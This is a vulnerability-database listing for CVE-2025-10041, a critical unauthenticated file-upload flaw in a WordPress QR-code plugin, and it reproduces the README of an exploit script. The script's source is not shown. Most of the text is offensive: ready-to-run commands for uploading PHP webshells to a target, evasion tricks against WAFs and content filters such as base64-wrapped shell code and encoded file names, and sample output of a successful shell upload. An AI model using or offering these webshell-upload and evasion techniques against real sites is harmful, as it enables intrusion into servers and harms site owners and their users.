CVE-2025-10041 PoC — WordPress plugin Flex QR Code Generator 代码问题漏洞

Source

Associated Vulnerability

Description

Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload

Readme

# CVE-2025-10041
Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload
# 🚨 Flex QR Code Generator ≤ 1.2.5 - Unauthenticated Arbitrary File Upload

---

## 📝 Description

The **Flex QR Code Generator** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `save_qr_code_to_db()` function in all versions up to, and including, `1.2.5`.  
This allows **unauthenticated attackers** to upload malicious files to the affected site's server, potentially leading to remote code execution.

- **CVE:** `CVE-2025-10041`
- **CVSS:** `9.8 (Critical)`

---

## 💡 About This Script

`CVE-2025-10041.py` is a professional exploit tool designed to automate the attack by leveraging this vulnerability.  
It provides advanced features for bypassing common protections and encoding techniques.

---

## ⚙️ Features

- **Automatic vulnerability detection** (version check)
- **Arbitrary file upload** (including PHP webshells)
- **Filename encoding bypass**: Base64 or URL encoding
- **Content encoding bypass**: PHP base64 wrapper for shell code
- **Randomized HTTP headers** to evade basic WAFs
- **Custom header support**
- **Full command-line interface** with argument parsing and help message

---

## 🖥️ Usage

### 1. **Basic Exploit**

```bash
python3 CVE-2025-10041.py -u http://target.com
```

### 2. **Shell Filename Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
```

### 3. **Shell Content Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
```

### 4. **Custom Shell Filename**

```bash
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
```

### 5. **Advanced (Combine Options)**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
```

### 6. **Custom Headers**

```bash
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
```

---

## 🆘 Help

To see all available options and usage instructions:

```bash
python3 CVE-2025-10041.py --help
```

---

## 🔓 Bypass Techniques

- **Filename encoding**: Some servers block `.php` or suspicious names; encoding may evade filters.
- **Content encoding**: Wrapping shell code in `eval(base64_decode(...))` may bypass content filters.
- **Random headers**: Rotating user-agent, referer, and cookies to avoid detection.
- **Custom headers**: Add your own headers for advanced evasion.

---

## 📋 Example Output

```
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
```

---

## ⚠️ Disclaimer

This script is provided **for educational, research, and authorized penetration testing purposes only**.  
**Unauthorized use** against systems you do not own or have explicit permission to test is strictly prohibited and illegal.  
The author is **not responsible** for any misuse or damage caused by this tool.

---

## ✍️ By:  
*Nxploited (Khaled Alenazi)*

---

File Snapshot

 [4.0K]  /data/pocs/c9fb5487c26b60f466a60d2cb4d9fe682675fd50
├── [6.5K]  CVE-2025-10041.py
├── [1.5K]  LICENSE
├── [3.2K]  README.md
└── [  17]  requirements.txt

1 directory, 4 files

Remarks